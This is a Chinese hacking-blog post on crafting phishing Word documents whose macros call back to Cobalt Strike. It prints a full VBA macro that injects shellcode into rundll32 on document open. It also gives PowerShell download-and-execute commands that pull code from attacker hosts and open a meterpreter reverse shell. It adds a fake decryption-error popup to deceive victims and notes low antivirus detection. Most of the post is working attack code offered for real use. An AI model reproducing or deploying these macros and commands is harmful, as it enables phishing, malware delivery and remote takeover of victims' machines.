记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

钓鱼文档碎碎念(一)

2020-10-26 09:35



本文将简单介绍使用宏代码进行钓鱼的方法,并使其可以回连到CobaltStrike. CobaltStrike.自带有宏钓鱼功能。可以使用如下步骤进行创建:


Attacks --> Packages --> MS offices Macro



内容大体如下


Private Type PROCESS_INFORMATION    hProcess As Long    hThread As Long    dwProcessId As Long    dwThreadId As LongEnd Type
Private Type STARTUPINFO cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As LongEnd Type
#If VBA7 Then Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long#Else Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long#End If
Sub Auto_Open() Dim myByte As Long, myArray As Variant, offset As Long Dim pInfo As PROCESS_INFORMATION Dim sInfo As STARTUPINFO Dim sNull As String Dim sProc As String
#If VBA7 Then Dim rwxpage As LongPtr, res As LongPtr#Else Dim rwxpage As Long, res As Long#End If myArray = Array(shellcode) If Len(Environ("ProgramW6432")) > 0 Then sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe" Else sProc = Environ("windir") & "\\System32\\rundll32.exe" End If
res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40) For offset = LBound(myArray) To UBound(myArray) myByte = myArray(offset) res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&) Next offset res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)End SubSub AutoOpen() Auto_OpenEnd SubSub Workbook_Open() Auto_OpenEnd Sub


那么下面,我们使用一个其他的方法来制作一个简单的钓鱼文档,首先新建一个word文档,然后转到宏编辑页面


随意输入一个名字,来到vb编辑页面



本例采用powershell上线的方法,进行宏攻击,我们可以参考已经公开的代码(https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/blob/master/MacroCode),即使用wmi来启动进程,来编写我们的宏代码

然后进行删减,得到如下宏代码,其实也只是删除了其中的计划任务部分而已。



Sub Auto_Open()
ExecutePersist
End Sub

Public Function Execute() As Variant Const HIDDEN_WINDOW = 0 strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/Invoke-Shellcode')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force", Null, objConfig, intProcessID End Function


因为他的宏,默认是ps是调用的invoke-shellcoded,也就是下面的内容:


powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/Invoke-Shellcode')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force


而我们的cs就不用这么麻烦,直接ps上线即可,如下:


powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.2.114:8011/a'))"


替换至对应地方,放入编辑器,执行,获取session



为了考虑其真实性,可以增加弹框,来增加其真实性,比如下面这种



代码如下


Result = MsgBox("The document cannot be decrypted.", vbAbortRetryIgnore + vbCritical, "Please contact 360.")



来看下查杀率:




由于宏内并没有什么shellcode所以导致静态查杀效果很好。


写在后面


在实战中,此类调用powershell的方法肯定不是最好的选择,这里也只是提供一个思路,比如某60套装,就已经把powershell限制的很死了,导致无法正常的使用其进行上线操作,在接下来的文章中,也会对其进行修改,达到更好的通用性。


参考文章:https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery


知识来源: https://mp.weixin.qq.com/s?__biz=MzU0MjUxNjgyOQ==&mid=2247485697&idx=1&sn=e5cf549c6abd2db2bea2de2ece2f386a&chksm=fb183a33cc6fb325a5ca4770a479a3764368e0bf27c881d22cc3583de54390676c7b0973483c&scene=27&k

阅读:16872 | 评论:0 | 标签:钓鱼

想收藏或者和大家分享这篇好文章→复制链接地址

“钓鱼文档碎碎念(一)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云